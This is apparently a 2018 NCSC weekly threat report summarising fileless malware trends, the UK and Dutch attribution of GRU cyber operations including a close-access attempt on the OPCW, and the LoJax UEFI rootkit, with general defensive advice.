Weekly Threat Report - 5th October 2018
Microsoft Warns Fileless Malware on the Rise
Media reporting has highlighted a recent warning from Microsoft that so-called ‘fileless’ malware attacks are on the rise.
According to the report, the trend towards fileless malware is being driven by the increasing effectiveness of antivirus solutions, which can detect the installation of malicious files on a hard-drive.
By contrast, traditional anti-malware products find fileless malware significantly more difficult to detect. This is because the malicious payload is not written to the hard-drive and is instead run directly in the system’s memory.
Fileless malware can use the default tools present on a computer, such as Powershell, to achieve malicious effects, a tactic known as ‘living-off-the-land'.
Whilst fileless malware is nothing new, knowledge of how to implement it is becoming more widespread. This has been accelerated by an increase in the number of tools that assist in the creation of fileless malware. The use of fileless malware and other more sophisticated techniques will become increasingly prevalent as malicious actors find new ways of circumventing security controls.
The simplest way to avoid this type of threat is to disable tools such as Powershell and Windows Management Instrumentation (WMI).
Attribution of Russian close access and remote cyber operations
Dutch and UK authorities attributed a range of malicious cyber activity to Russian military intelligence (GRU) on Thursday 4 October.
One operation was a close access operation against the Organisation for the Prohibition of Chemical Weapons (OPCW) in the Hague. Unlike most malicious cyber operations which are conducted remotely, this required physical proximity to the targeted system. In this case the attackers used equipment to attempt to gain access to the OPCW’s Wi-Fi network. Other close access operations require hands-on access to a target’s devices.
Several other operations involved the use of spear-phishing, in which the attacker crafts an email targeted at a specific individual, aiming to make them click on a malicious link or open a malicious attachment.
In response to Thursday’s attributions, NCSC has also published a technical advisory on indicators of compromise for malware used by APT28.
NCSC has also published advice on avoiding phishing attacks and securing end user devices.
LoJax – A new type of rootkit
Security researchers at anti-virus software company ESET have revealed a new type of malwarethat is capable of surviving reinstallation of the Windows operating system or even hard drive replacement.
This type of clandestine rootkit is designed to provide continued privileged access to a computer while actively hiding its presence. This is the first time this type of malware has been seen ‘in the wild’.
The malware dubbed “LoJax” makes use of the Unified Extensible Firmware Interface (UEFI) which enables the connection of a computer’s firmware to its operating system and is largely replacing the Basic Input Output System (BIOS). Like BIOS, UEFI is installed at the time of manufacture and is the first program that runs when a computer is turned on. This enables LoJax to start every time the computer is booted.
The malware is based on an older version of a legitimate application called LoJack and/or Computrace, which enables stolen devices to be found. The code is hidden within the UEFI firmware and when started, connects to a command and control server over the internet.
The researchers have attributed LoJax to the threat group Sednit/Fancy Bear/APT28.
Removing the malware from an infected device involves updating (or re-flashing) the UEFI firmware, an operation not commonly done and certainly not by the typical user.
Infection prevention is easier than a cure. PCs with Windows 8 and 10 are shipped with a feature called “Secure Boot” enabled which is designed to prevent digitally unsigned software from hijacking the boot process and concealing itself from the operating system.
NCSC provides detailed guidance on the management of UEFI firmware settings which will almost certainly prevent this type of malware attack.